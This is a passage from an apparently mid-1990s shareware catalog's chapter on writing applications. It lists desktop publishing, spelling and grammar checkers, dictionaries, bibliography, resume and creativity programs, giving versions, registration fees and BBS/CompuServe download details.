paste your puzzles into any Windows + application. WYSIWYG display lets you resize the puzzle grid, + select fonts, etc. Also creates Windows bitmap (.BMP) graphic + files. Cannot be used for puzzle design, but will accept + crossword data files (.XWP format only) from other programs. + + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 525. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 554. + + Product: EnVision Publisher + Author: Software Vision Corporation, 813-545-4354 + Version: 1.0 (09-01-92) + Needs: IBM PC, DOS 2.0 or better. CGA or Hercules monitor. + Strongly recommended: mouse, hard disk. + Registration fee: $69.00 + Registration benefits: Printed manual, master disks, bonus + clipart libraries & scalable fonts, newsletter support, upgrade + discounts. + Look for: EVP100*.ZIP on BBSs (multiple files) (call 813-585-7082 + to download it at no charge); EVP1*.EXE on CompuServe in + CIS:IBMAPP forum LIBrary 6 (multiple files) (or contact userID + 70304,64 for assistance); EVP1*.EXE on GEnie in IBMPC forum + LIBrary 0. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1993 winner, Shareware Industry + Awards. + Description: + A full-feature WYSIWYG desktop publishing program. It has a + mouse-driven Graphical User Interface and it can be used with + or without a mouse. Detailed context-sensitive help. Lets you + + Chapter 3, "Writing applications" 238 + + + + create publications directly on the screen, and then print them + on any printer. Provides scalable fonts that can be rotated and + filled with any fill pattern. You can import PCX images, and + draw lines, boxes, polylines, polygons, ellipses and Bezier + curves. + + + Product: FontBook Professional + Author: The C Group, Inc., 718-251-1891 + Version: 2.7 (06-13-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse; XMS memory. + Strongly recommended: math coprocessor. + Registration fee: $15.00 (add $7.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy. Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: FONTBK27.ZIP on BBSs (call 718-241-0225 to download it + at no charge); FONTBK.ZIP on CompuServe in CIS:DTP forum + LIBrary 6 (or contact userID 76670,2602 for assistance). + SWREG#: 1991 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + Lets you select some or all of your fonts and display them on + the screen or print speciman sheets showing different types, + styles and point sizes. Additionally, it will print and + display symbol sets for each font indicating the 4 digit ansi + code needed for display in other programs. It will also print + Type Rulers for selected fonts. A definite must for the DTP + professional. Optimized to run concurrently with other DTP + software. + + + Product: Graphcat/DOS Clip Art Cataloger + Clip art cataloger for WordPerfect 6.0/5.1. See full + description on page 266. + + Product: Graphcat/Win Clip Art Cataloger + Graphcat clip art cataloger for WPWin61/52. See full + description on page 267. + + Product: Hubble + Hubble 2.21 image + doc edit & processing. See full + description on page 560. + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 268. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 268. + + Chapter 3, "Writing applications" 239 + + + + Product: MultiLabel + Author: OsoSoft, 805-528-1759 + Version: 3.5 (04-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; XMS memory; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, BBS, + CompuServe, mail support; lifetime return policy; bonus + graphics; all ASP-wide offers (see page 6); discounts on + upgrades. Lifetime free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLTLBL.ZIP on BBSs (call 805-528-3753 to download it at + no charge); MLTLBL.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + This popular Windows label designer creates and prints labels + on all Avery laser label stock or create custom sizes. Name + tags, postcards, and more, too. Use all Windows fonts, BMP/PCX + clip art and line drawing tools. Serial numbers, address book, + and more. Supports all Windows printers, including color. + Rotate text. Print sheets of same labels or merge labels from + address book. Best of its class. + + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 113. + + Product: Rockford! + Author: OsoSoft, 805-528-1759 + Version: 3.5 (05-01-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited fax, BBS, + CompuServe, mail support; lifetime return policy; bonus + graphics; all ASP-wide offers (see page 6); discounts on + upgrades. Lifetime free upgrading allowed. + Look for: ROCKFORD.ZIP on BBSs (call 805-528-3753 to download it + at no charge); RCKFRD.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Designs business cards in Windows. Use TT/ATM fonts; BMP/PCX + clip art; line drawing tools. Print on pre-scored stock from + Paper Direct and others or print 200% or 4-up camera-ready + layouts. Rotate text; insert foreign characters; right-click + help; overlay text on graphics; vertical or horizontal card + formats; color printer support; much, much more. Design + professional business cards for yourself or to earn money. + Create sheets of cards in minutes! + + Chapter 3, "Writing applications" 240 + + + + Product: Rubicon Publisher + Author: Rubicon Computer Labs Inc., 819-770-4317 + Version: 2.2C (06-08-91) + Needs: IBM PC, DOS 2.1 or better. Hard disk. VGA monitor + recommended. + Registration fee: $59.50 + Registration benefits: Printed manual, bonus fonts, third-party + font support, bonus features. + Look for: availability unknown on BBSs. + Download size: 337k (about 25 minutes with a 2400 baud modem) + Description: + Comprehensive desktop publisher based on traditional + typesetting concepts; over 120 features. Supports over 200 + printers including most popular 9 & 24 pin dot matrix, LaserJet + 2 & 3, & Postscript. Comes with 2 font families; supports + LaserJet 3 & Postscript fonts. Batch processor, controlled by + tags embedded in the input file. User's present word processor + or text editor can be used to prepare (Ascii) files for + publication. Screen preview provided for computers with VGA. + Great quality output! + + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 571. + + Product: Top Draw + Powerful object-oriented drawing program. See full description + on page 557. + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 357. + + + 3.6 Spelling checkers + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 429. + + Chapter 3, "Writing applications" 241 + + + + Product: Spelling Sentry + Author: Wintertree Software Inc., 613-825-6271 + Version: 1.3 (04-09-94) + Needs: IBM AT (80286), Windows 3.1 or better. 200k RAM; VGA + monitor; Hard disk. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; disks of other shareware; discounts on upgrades. + Look for: availability unknown on BBSs; SPELLS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 8 (or contact userID 72060,3056 + for assistance). + SWREG#: 1810 + PsL#: 11106 + Download size: 312k (about 23 minutes with a 2400 baud modem) + Description: + A spelling-checker application for Microsoft Windows 3.1. Can + check and correct the spelling of words in Write files, text + files, and the clipboard. Comes with a 100,000-word dictionary + and supports three types of user dictionaries. Additional + features include: American/British spelling rules selection; + Drag-and-drop file checking; readability statistics; can + automatically correct frequently misspelled words; highly + accurate suggested replacements. + + + Product: Thelma ThistleBlossom + Checks grammar, style, spell, punc & more. See full + description on page 246. + + Product: Thelma's SpellPlus + Author: Timpanogos Software, 801-223-9055 + Version: 1.1 (01-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $9.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of phone, newsletter, mail support; + 1-month return policy; all ASP-wide offers (see page 6); + discounts on other products. 1-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Finds spelling errors, uncapitalized names, long sentences, + padding, doubled, offensive words. More words than Sharespell. + 1000s of names and trademarks. Reads ASCII, WordPerfect, and + other files. Shows problems in context. Gives spelling + replacements. Provides both full editor and automatic + correction. Re-checks changes! Can add words to dictionary. + Fast, user-friendly. + + Chapter 3, "Writing applications" 242 + + + + Product: Word Fugue + Industrial strength word processing. See full description on + page 233. + + + 3.7 Dictionaries + + Product: Relor Rhyming Dictionary + Author: Doyle Bare, 310-519-8049 + Version: 1.0 (10-02-94) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $20.00 + Registration benefits: 3 months of phone, mail support. + Look for: RHYME.ZIP on BBSs. + Download size: 276k (about 21 minutes with a 2400 baud modem) + Description: + This is a rhyming dictionary program. Type in a word and the + program lists the words that rhyme. It is usefull for song + writers, poets, copywriters, or anyone who uses rhyme words. + The DOS version also contains a text editor. + + + Product: Visual Computer Dictionary Plus + Graphically portrays computer definitions. See full + description on page 529. + + + 3.8 Thesaurus + + Product: BESTHES + Author: LANGUAGE SOFTWARE Co. + Version: 1.5 (08-01-94) + Needs: IBM PC, DOS 3.2 or better. 47k RAM. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited fax, CompuServe, mail + support; 3-month return policy; bonus utilities; discounts on + upgrades. + Look for: BESTH150.ZIP on BBSs (call 718-837-3236 to download it + at no charge); BESTH1.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 2 (or contact userID 100274,655 for assistance); + BESTH150.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 2647 + PsL#: 11511 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Equipped with a basic vocabulary of 16,250 entries x 185 (avg.) + related words per entry. Two available vocabulary-enrichment + modules extend to 28,635 entries x 210 w. per entry (6,013,350 + words). Loadable in high memory. Compatible with most word + processors in text mode, DOS 6 DoubleSpace and QEMM v7.04. May + + Chapter 3, "Writing applications" 243 + + + + be used as an integral part of your word processor as well as a + standalone application. + + + 3.9 Style checkers + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 253. + + Product: Cliche Finder [***] + Author: R.K. West Consulting + Version: 2.0 (05-10-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CLICH20.ZIP on BBSs; CLICHE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 141k (about eleven minutes with a 2400 baud modem) + Description: + Checks for the presence of cliches and overused phrases. Cliche + list can be edited by user. Generates a report. + + + Product: PC-Proof + Author: Intellect Systems, 206-226-0429 + Version: 2.0A (10-18-93) + Needs: IBM PC, DOS 3.1 or better. Hard disk. Mouse recommended. + Registration fee: $40.00 + Registration benefits: Printed manual, master disks, phone + support. + Look for: availability unknown on BBSs; PC-PRO.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 2 (or contact userID 72630,3457 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + A commerial quality grammar checking program that can detect + many complex and embarrassing grammar errors. These errors + include dropped words, extra words or words which may have been + misspelled into another word. Can also detect many many other + mistakes including subject/verb agreement, and passive voice. + Compatible with WordPerfect, Word, Works, WinWord, ProWrite, + PC-Write, WordStar and others. Full mouse support. + + Chapter 3, "Writing applications" 244 + + + + Product: Thelma ThistleBlossom + Author: Timpanogos Software, 801-223-9055 + Version: 5.20 (12-26-93) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, + newsletter, mail support; 2-month return policy; all ASP-wide + offers (see page 6). 1-month free upgrading allowed. + Look for: availability unknown on BBSs; THISTLEB.ZIP on GEnie in + WORDPERFEC forum LIBrary 6 (or contact userID WP.TED for + assistance). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Combines grammar, punctuation, spelling, cliche, and usage + checking in a single pass. When it finds a problem, it displays + the sentence in context, highlights the problem, explains what + is wrong, and gives you a suggestion. Often you can implement + the suggestion with a single keystroke. You may also use a + built-in editor to change the text. Automatically rechecks any + sentence that you change. Easy, powerful, fast, and thorough. + Creates strong, readable business letters. + + + Product: Thelma's ClichePlus + Author: Timpanogos Software, 801-223-9055 + Version: 1.8 (01-04-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $9.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of unlimited phone, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs. + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Finds cliches, idioms, long sentences, short sentences, too + many or too few spaces at the end of a sentence. Differs from + ClicheFinder: + 1. thousands more entries; + 2. more sophisticated pattern matching; + 3. shows problems in context; + 4. provides full editor; + 5. re-checks changes. + Reads ASCII, WordPerfect, and other file formats. + + Chapter 3, "Writing applications" 245 + + + + Product: Thelma's SpellPlus + Spell, capitalizes, proper nouns, full editor. See full + description on page 241. + + Product: WinProof + Author: Intellect Systems, 206-226-0429 + Version: 1.0C (01-28-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $45.00 + Registration benefits: Printed manual, master disks, phone + support. + Look for: availability unknown on BBSs; WINPRO.EXE on CompuServe + in CIS:IBMAPP forum LIBrary 2 (or contact userID 72630,3457 for + assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A professional grammar checker for Windows that can detect many + complex and embarrassing errors like dropped words, extra words + or words that have been misspelled into another word. Can also + detect may other mistakes including subject/verb agreement, + misused articles and passive voice. Not another feeble style or + readability checker. It knows English! Compatible with all + major word processors and can check the clipboard. + + + Product: WStyle + Author: Wintertree Software Inc., 613-825-6271 + Version: 1.13 (07-25-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; Epson printer. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 6). + Look for: availability unknown on BBSs. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Helps improve your writing style in two ways. First, it + examines your writing for common problems, such as redundant + words, wordy phrases, and awkward sentence structure. Second, + it analyzes your writing style and presents statistics that + tell you where your writing is weak and where it is strong. + Although it is not a substitute for an independent review, it + can help you to write more clearly and directly and avoid + common writing-style errors. + + Chapter 3, "Writing applications" 246 + + + + 3.10 Bibliography + + See also: Education. + + Product: BIBLOGIC + Author: Biblogic Computer Services + Version: 3.02 (12-19-93) + Needs: IBM PC, DOS 2.1 or better. 640k RAM. + Strongly recommended: Hard disk. + Registration fee: $47.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited fax, CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs; BIBLOG.ZIP on CompuServe + in CIS:EDFORUM forum LIBrary 2 (or contact userID 75020,556 for + assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A research and writing tool to store, retrieve, and print + bibliographic information and associated remarks. Handles many + different reference styles and organizes notes as well as + references. Works with most word-processors. + + + Product: REFILE + Document management software. See full description on + page 524. + + Product: RMS-III: Ref.Mgn.Sys. + Author: Mulberry Software, Inc., 201-670-9856 + Version: 3.2b (03-20-94) + Needs: IBM PC, DOS 3.0 or better. 510k RAM. + Strongly recommended: Hard disk. + Registration fee: $55.00 (add $10.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; bonus utilities; all ASP-wide + offers (see page 6). 3-month free upgrading allowed. + Look for: RMS32B.ZIP on BBSs; RMS32B.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 74267,2713 for + assistance). + Download size: 603k (about 45 minutes with a 2400 baud modem) + Description: + Annotated menu based system for handling biblio/reference + material for research, writing, collecting. Many options for + view, search, retrive, report, lists, import/export, duplicate + checks, and data statistics. Has 21 fields including authors, + title, source, year, keywords, special codes, etc. and free- + text abstract/notes. Output to printer or generic wordprocessor + files with many list and card formats plus user definable + styles to fit publication requirements. dBase III(r) data + files. + + Chapter 3, "Writing applications" 247 + + + + 3.11 Document boilerplates + + 3.11.1 Resume' + + Product: FYI/For Your Eyes Only + Author: PC-DSD, 800-427-8123 + Version: 2.3 (03-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $37.50 + Registration benefits: Three months phone support, one year of + free updates. + Look for: YIV23U.ZIP on BBSs (call 714-681-6221 to download it at + no charge); YIV23U.ZIP on CompuServe in CIS:BUSINESS forum + LIBrary 2 (or contact userID 70742,2473 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A complete address book and resume writer. It features an + elegamt interface with pull down menus and popup scolling + tables. Lets you track up to 9,999 personal phone numbers and + can print standard reports that can be viewed or printed. Can + also write personal resume for new job searches. Searches for + phone numbers by name or company name. Included are three + numbers supported, also features personal memo writer for + letter or notes. Rolodex cards, and mailing lables and much + more + + + Product: FYI2/Business Office Manager + Author: PC-DSD, 800-427-8123 + Version: 2.3 (03-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $59.50 + Registration benefits: Three months phone support, one year of + free updates. + Look for: YI2V23.ZIP on BBSs (call 714-681-6221 to download it at + no charge); YI2V23.ZIP on CompuServe in CIS:BUSINESS forum + LIBrary 2 (or contact userID 70742,2473 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A complete but Simple Business Office Manager, personal resume + writer, memo writer, address book, business project manager, + rolodex, mailing labels, business directory, employee + management database, personal horoscope. + + Chapter 3, "Writing applications" 248 + + + + Product: Resume Master Deluxe + Author: Whirlwind Technologies + Version: 4.0 (02-01-94) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Hard disk. + Registration fee: $20.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; discounts on upgrades. + Look for: availability unknown on BBSs. + SWREG#: 1938 + PsL#: 11143 + Download size: 380k (about 28 minutes with a 2400 baud modem) + Description: + A powerful resume generating tool that will give you the + winning edge needed in today's job market. Easy-to-use & menu + driven. Prompts you to enter information about yourself, past + work history, education, etc. This information is then + formatted & printed to create a professional-looking customized + one-page resume. Creates choice of chronological or targeted + resume. Supports any printer. Online help system & on-disk + user's manual. Print resume to file for customization. + + + Product: The Right Resume + Author: Whirlwind Technologies + Version: 1.0c (05-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited CompuServe, mail + support; bonus utilities; bonus data; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs. + SWREG#: 4388 + PsL#: 11756 + Download size: 1131k (about 84 minutes with a 2400 baud modem) + Description: + Powerful Windows-based job hunting package. Features include: + Create choice of chronological, functional, or targeted resume; + Fully-functional WYSIWYG word processer for creating cover + letters, customizing your resume, etc.; Generate multiple + resumes from one data source without having to retype; Modify + feature to easily reorganize or delete data; On-disk user's + manual and on-line help system. + + + 3.12 Document control & management + + Product: LPRINT + Formats & prints files for PS w/ borders, etc. See full + description on page 114. + + Chapter 3, "Writing applications" 249 + + + + Product: MegaWord + More than 30 add-in apps for WinWord 6.0. See full description + on page 262. + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 429. + + Product: REFILE + Document management software. See full description on + page 524. + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 231. + + + 3.13 Creativity & brainstorming + + See also: Business, Training & support aids, Lecturing & slide + shows. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 230. + + Product: Creativity Package [***] + Author: R.K. West Consulting + Version: 4.0a (07-29-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $34.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: CREAT40A.ZIP on BBSs; CREATE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10195 + Download size: 460k (about 34 minutes with a 2400 baud modem) + Description: + 3-part program for writers, teachers, students, executives - + anyone who must produce fresh ideas. Includes a complete book- + on-disk on creativity enhancement, software for computer-aided + brainstorming, and a poetry writing program. + + + Product: Curses! [***] + Creative insult generator. See full description on page 681. + + Chapter 3, "Writing applications" 250 + + + + Product: Grammar Expert + Online reference for English grammar. See full description on + page 254. + + Product: OMNIDay For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.70 (02-28-95) + Needs: IBM PC, DOS 3.1 or better. 330k RAM; CGA monitor; + Hercules monitor. + Strongly recommended: Dual 720k floppy drives; Hard disk; HP + LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ODAYW270.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY4W.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 1715 + Download size: 334k (about 25 minutes with a 2400 baud modem) + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 99 pages of 2K each. User can + update and delete entries. Will print out opus for selected + dates or all. Full featured text editor with on line help. + Import feature for those who travel. Includes diary keeping + tips. + + + Product: On This Day + "What happened on this day in history?" See full description + on page 539. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 540. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 516. + + Chapter 3, "Writing applications" 251 + + + + Product: Poetry Generator [***] + Author: R.K. West Consulting + Version: 2.4a (01-28-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; discounts on upgrades. + Look for: POET24A.ZIP on BBSs; POETRY.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 515k (about 38 minutes with a 2400 baud modem) + Description: + Turn your computer into a poet! Using a 20,000-word vocabulary, + this program creates free-verse poems at the touch of a button. + Using the structure of actual poems as models, the program + randomly combines words and short phrases into verses 4 to 9 + lines long. The results as fascinating. Some of these poems + have actually been published in national magazines. This + program has been featured in the Los Angeles Times, Scientific + American, and Writer's Digest. + + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 519. + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 231. + + + 3.14 Writing utilities + + Product: Bookbild/DOS Pamphlet Publisher + Converts doc. file to camera-ready booklet. See full + description on page 265. + + Product: Bookbild/Win Pamphlet Publisher + Builds single-fold brochures in WPWIN 5.2. See full + description on page 266. + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 221. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 222. + + Chapter 3, "Writing applications" 252 + + + + Product: BUDDY: A Tutorial Companion + Author: Chatfield Software, Inc., 216-632-5447 + Version: 1.2 (08-05-92) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives. + Registration fee: $19.50 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited + tollfree 800# phone, fax, CompuServe, GEnie, newsletter, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: CSBDY.ZIP on BBSs; CSBDY.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 0 (or contact userID 71031,1036 for + assistance); CSBDY.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 132k (about ten minutes with a 2400 baud modem) + Description: + Are you already pretty good with your word processor? Now in + just eight lessons you can (a) write more effectively and (b) + avoid some embarrassing mistakes. Also lets you enjoy wacky + banter with your PC - as "comic relief" to the very serious + business of clear and strategic writing. Written in the AI + language INRAC, which means that you can conduct typed + conversations with the program in standard English. Contains a + special "common error detector." + + + Product: Cliche Finder [***] + Checks writing cliches. See full description on page 243. + + Product: Grammar Expert + Author: Wintertree Software Inc., 613-825-6271 + Version: 1.02 (02-15-93) + Needs: IBM AT (80286), Windows 3.1 or better. 100k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; bonus data; all ASP-wide offers (see page 6); disks of + other shareware. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; GE102.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 8 (or contact userID 72060,3056 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An online, hypertext reference book for the rules of English + grammar, punctuation, and effective writing. Contains practical + answers, guidelines, and advice on thousands of grammar-related + points for business, writers, students, and people learning + English as a second language. Use its online index and table of + + Chapter 3, "Writing applications" 253 + + + + contents to locate the information you need quickly. Explains + the grammatical rules involved and provides plenty of examples. + + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 379. + + Product: The Letterhead Kit/DOS + Retrieves custom letterheads, graphics, bills. See full + description on page 268. + + Product: The Letterhead Kit/Win + Retrieves custom letterheads, graphics, bills. See full + description on page 268. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 243. + + Product: Simply Docs + Converts ASCII files to EXEs. TSR/print opts. See full + description on page 65. + + Product: Thelma ThistleBlossom + Checks grammar, style, spell, punc & more. See full + description on page 243. + + Product: WinProof + Windows grammar checker. See full description on page 245. + + 3.14.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: MEGA EDIT Editor for Windows + Text editor for large files. See full description on page 224. + + + 3.15 Software tools & macros + + 3.15.1 For multiple programs + + Product: dtSearch for DOS + Text retrieval program. See full description on page 289. + + Product: dtSearch for Windows + Text retrieval program. See full description on page 289. + + Product: Fonts Ink Fonts + Specialized TrueType and PostScript fonts. See full + description on page 86. + + Chapter 3, "Writing applications" 254 + + + + Product: Over_LAZ HP + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 4 (01-01-94) + Needs: IBM PC, DOS 2.0 or better. CGA monitor; Hard disk; HP + LaserJet printer. WordPerfect 5.x, 6, WordStar, Word, AMI Pro + or PC-Write. HP LaserJet II/III/4 printer. + Strongly recommended: Word processing program, spread sheet, + data base. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of phone, + CompuServe, mail support; bonus templates. 3-month free + upgrading allowed. + Look for: availability unknown on BBSs; OVER4.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 2 (or contact userID 72060,1153 for + assistance). + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + A collection of over 150 printer overlay files for WordPerfect + 4.2 or later, Word, Word for Windows, AmiPro WordStar, PC- + Write, dBase, and other applications and an HP LaserJet + compatible printer. Over_LAZ are provided for standard office + forms (inter office memo, FAX transmittal, etc) as well as + 'rubber stamps' (draft, confidential, etc) and decorative page + borders. Over_LAZ are automatically printed on the page over + your document. Extra fonts are not required. 512k printer RAM + is sufficient. + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 45. + + Product: ToolDriver + Developer tools to organize files and names. See full + description on page 493. + + Product: UnderBar + Automatic printing of POSTNET bar codes. See full description + on page 99. + + Product: WonderBar + TSR to print POSTNET bar code for mailing. See full + description on page 101. + + 